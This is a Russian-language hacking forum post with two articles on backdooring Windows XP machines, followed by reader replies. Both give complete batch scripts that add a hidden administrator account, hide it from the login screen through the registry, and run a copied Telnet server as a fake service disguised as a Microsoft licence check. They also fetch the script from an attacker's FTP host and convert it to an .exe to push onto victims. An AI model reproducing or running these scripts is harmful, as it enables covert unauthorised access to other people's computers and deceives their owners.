Данная статья предназначена для пользователей умеющих пользоваться консолью и знающих о telnet'е. Всё приведйнное ниже тестилось на машинах под управлением операционной системы Windows XP SP2.
]MENU[
1,2. Для тех, кто имеет доступ к машине.
2. Для впаривающих.
3. Развязка
]START[
1. Нам нужно паписать батник, в котором прописываются все параметры будущего телнета.
Вот собсно и он, run.bat (в архиве):
chcp 1251
net user SUPPORT_388945a0 /delete
net user SUPPORT_388945a0 pas /add
net localgroup "Администраторы" SUPPORT_388945a0 /add
net localgroup "Пользователи" SUPPORT_388945a0 /del
copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe"
ECHO Windows Registry Editor Version 5.00>>user.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>user.reg
ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg
regedit /s user.reg && DEL user.reg
sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Проверка подлинности Microsoft Windows" error= ignore depend= RPCSS/TCPIP/NTLMSSP
sc description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение."
tlntadmn config port=1451 sec=-NTLM
net start "Проверка подлинности Microsoft Windows"
Расшифровываю:
chcp 1251 - переходим на 1251 кодировку, без этого не как, иначе нужно будет перекодировать в досовскую кодировку, например группа "Администраторы" будет такова "Ђ¤¬Ё*Ёбва*в®ал".
net user SUPPORT_388945a0 /delete - удаляем стандартного скрытого юзверя.
net user SUPPORT_388945a0 pas /add - добавляем его-же, только каплю подделаем его под себя. pas - вместо этого нужно ввести пароль.
net localgroup "Администраторы" SUPPORT_388945a0 /add - добавляем юзверя SUPPORT_388945a0 в группу "Администраторы".
net localgroup "Пользователи" SUPPORT_388945a0 /del - удаляем узверя SUPPORT_388945a0 из группы "Пользователи" (когда мы создали пользователя он присвоил себе группу пользователей, а когда мы присвоили ему группу админов, он просто стал учавствовать в обеих группах).
copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe" - Берёт стандартный файл сервера tlntsvr.exe, копирует его в ту же директорию, только уже под другим именем (tlntsevr.exe).
ECHO Windows Registry Editor Version 5.00>>user.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>user.reg
ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg
regedit /s user.reg && DEL user.reg - изменение реестра, сначала воспроизводится написанное, за тем импортируется в реестр. SUPPORT_388945a0 - данный юзверь сдесь скрывается от посторонних глаз, т.е. не будет отображаться во время входа в систему, при просмотре пользователей через панель управления и т.д. (конец в ветке "UserList" без пробелов! почему-то исправляется...).
sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Служба доступа к сети Microsoft" error= ignore depend= RPCSS/TCPIP/NTLMSSP - создаём службу, %windir%\system32\tlntsevr.exe - путь до файла сервера телнета, "Проверка подлинности Microsoft Windows" - название службы.
sc description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение." - её описание.
tlntadmn config port=1451 sec=-NTLM - порт 1451
net start "Проверка подлинности Microsoft Windows" - старт службы
2. Вот мы зашли на машину через некий telnet или его подобие, переходим в любую директорию. На своей машине запускаем ftp сервер, например Pablos ftp server (в архиве), переходим во вкладку User Accounts, там всё интуетивно понятно, указываем дынные для конекта.
В консили переходим в нужную директорию, за тем пишем:
------------ Способ 1.
------------
ftp
open 111.111.111.111
SUPPORT_388945a0
pas
get run.bat
bye
"run.bat"
ftp - угадайте что
open 111.111.111.111 - открыть ип 111.111.111.111 (ваш ип).
SUPPORT_388945a0 - логин пользователя.
pas - пароль.
get run.bat - отправить наш батник.
bye - выйти из ftp
"run.bat" - запустить батник (при нужде вводим путь).
------------ Способ 2. Тут нам вообще не нужен ftp и вообще на много меньше мороки, но всеравно, попробуйте и первым способом.
------------
Копируем код батника, маус 2 в консоли, волшебный пункт "Вставить" (у кого-то Past ), жмём Enter и всё))
Ну да, да...очень сложно... но первый способ всеравно попробуйте))
3. Ну и самое интересное и долгожданное:
Вводим в консоль:
telnet 222.222.222.222 1451
222.222.222.222 - ип жертвы
1451 - порт
Хотя зачем это разъяснять, если вы умееть пользоваться телнетом, но вдруг кто-то уже забыл).
Что бы создать .exe юзаем программу "Bat To Exe Converter" (в архиве).
Архив к статье: [Ссылки могут видеть только зарегистрированные пользователи. ] (537.94Kb).
Добавлено через 1 минуту
Нетрадиционные способы закрепиться на вин машине.
1h Интра.
Все знают как ставить удаленно радмин через консоль, способ конечно хороший, но впринципе можно обойтись
и без радмина, поэтому речь данной статьи пойдет о том как можно закрепиться на вин машине другим способом
и поднять на ней парочку самых нужных вам серверов Статья расчитана на тех у кого есть опыт работы в командной
строке винды.
2h Поехали !
Вот вы получили шел доступ к тачке которая постоянно онлайн и с широким каналом, а терять такой шел ой как
не хочеться поэтому приступим:
Многие знают что в винде есть такой сетевой демон Telnet, запуск которого по умолчанию отключен, можно конечно ,
его включить,но сначала надо сменить тип его запуска на auto(по дефолту disabled )
sc config tlntsvr start= auto
можно впринципе уже запускать Telnet сервер, но так как он по умолчанию будет висеть на 23 порту не есть гуд слишком
палевно так что конфигурируюм его так,
tlntadmn config port=1001 sec=-NTLM
где номер port'а должен быть до 1024, лучше неуказывать попсовые порты, дабы если вы укажете порт нетбиоса ,который например уже юзаеться из-за того, что юзер сиди помимо нета еще и в локалке ,то телнет сервер нестартанет
так как порт будет занят и придеться обломаться.
после конфигурации Telnet сервера запускаем его
net start Telnet
В принципе все уже готово осталось тока добавить нового админа, подрубиться и наслаждаться только что полученным шелом.
Все это конечно хорошо, но имя службы Telnet очень палевное, поэтому я решил рассмотреть
создание фейковой службы, которая запускает все тот же tlntsvr.exe под тем же или другим именем,
можно например создать копию tlntsvr.exe в той же папке (system32) с имнем system.exe или System без расширения,
так даже круче потому-что намного беспалевней чем tlntsvr.exe, кстати все службы запускаються с правами системы,
можно конечно заюзать любимое многими вирмейкерами имя svchost.exe, но так как в system32 уже есть такой бинарник,
то придеться грузить его из каконибудь другой папки.
Регистрация новой службы:
sc create "Microsoft Network" binpath= %windir%\system32\tlntsvr.exe type= own start= auto displayname= "Служба доступа к сети Microsoft" error= ignore depend= RPCSS/TCPIP/NTLMSSP
sc description "Microsoft Network" "Позволяет вашему компьютерам получать доступ к ресурсам сети Microsoft."
в binapth надо указать путь к самому tlntsvr.exe или его копии с другим именем, вообщем данным способом можно создавать свою службу которая будет грузить любой бинарник - это нам понадобиться чуть позже
сразу после создания нашей службы настраиваем телнет сервер с помошью tlntadmn как было описано выше,
все осталось тока запустить службу пишем net start "Имя службы какое вы указали в displayname"
net start "Служба доступа к сети Microsoft"
Так как все команды писать вручную или копипастить не лучший вариант, то создаем батник следующего содержания:
chcp 1251
net user SUPPORT_388945a0 /delete
net user SUPPORT_388945a0 1234 /add
net localgroup Администраторы SUPPORT_388945a0 /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc create "Microsoft Network" binpath= %windir%\system32\tlntsvr.exe type= own start= auto displayname= "Служба доступа к сети Microsoft" error= ignore depend= RPCSS/TCPIP/NTLMSSP
sc description "Microsoft Network" "Позволяет вашему компьютерам получать доступ к ресурсам сети Microsoft."
net start "Служба доступа к сети Microsoft"
tlntadmn config port=1001 sec=-NTLM
Пояснения к батнику:
chcp 1251 меняем кодовую страницу на 1251 так как батник написан не в дос кодировке
немного о SUPPORT_388945a0: это стандартная виндосовская учетка какая есть в xp prof и в 2003 server,
по дефолту она отключена,поэтому использовать ее имя дла нового админа будет наилучшим вариантом.
Так как при создании нового админа он будет виден в welcome screen'е, отключить его можно импортировав
рег файл следующего содержания:
Содержимое conf.reg
В принципе можно не удалять и не создавать заново эту супортовскую учетку, а сделать так
net user SUPPORT_388945a0 1234
net localgroup Администраторы SUPPORT_388945a0 /add
net localgroup тут_суппорт SUPPORT_388945a0 /del
Чтобы загрузить наш батник и рег с какого-нибудь народовского сайта на взломанную машину пишем в консоли
cd %temp%
echo open ftp.narod.ru>sc.txt
echo login>>sc.txt
echo pass>>sc.txt
echo ascii>>sc.txt
echo get /files/r.bat>>sc.txt
echo get /files/conf.reg>>sc.txt
echo bye>>sc.txt
ftp -s:sc.txt
Все осталось тока выполнить наш батник r.bat и юзать взломанную тачку через телнет.
Плюсы и минусы поднятия Telnet сервера:
+ Если юзать виндосовский телнет клиент то будет работать автодополнение
+ Все есть в самой системе
+ Нет проблем с антивирусом
- Нет шифрования трафика
- Создаеться профиль пользователя под каким мы логинимся, но это поправимо см.в конце
- При подключении будет висеть процесс cmd.exe запущенный от имени supp.....
__________________________________________________ _________________________________________________
Ну вот мы и подошли ко второму способу забекдурить вин машину, а бекдурить мы будем ее как это не смешно
с помошью open ssh сервера
Начнем !
(имееться ввиду инсталяционный скрипт NSIS'а подправить )
.................
__________________________________________________ __________________________________________________
Writed by Null
[Ссылки могут видеть только зарегистрированные пользователи. ]
вообщем данным способом можно создавать свою службу которая будет грузить любой бинарник
Спасибо!давно хочу создать службу в командной строке,или cmd!
все остальное Знаю,люблю Батник - самый легкий и Лучший язык!!!
аж с 99года,когда были 486DX2-66 или Pentium PRO - Классика!написания батников для MS.DOS...v6.22,и типо того!
Материалы, находящиеся на этом ресурсе, были добавлены пользователями сайта, либо найдены в интернете как свободно распространяемые. Если Вы являетесь законным правообладателем той или иной продукции,
и условия, на которых она представлена на данном ресурсе, не соответствует действительности, просьба незамедлительно связаться с администрацией сайта с целью устранения правонарушения.
Все материалы доступны исключительно для личного пользования в ознакомительных целях и не должны использоваться для последующего распространения или получения коммерческой выгоды. За информацию в рекламных новостях или объявлениях ответственность несет рекламодатель!
Копирование авторской информации разрешено лишь с разрешения администрации сайта, с указанием активной гиперссылки на icq-num.ru, как на первоисточник.
: 
Скрытый telnet доступ к Windows
Статья расчитана на тех у кого есть опыт работы в командной
Спасибо!давно хочу создать службу из cmd
Линейный вид
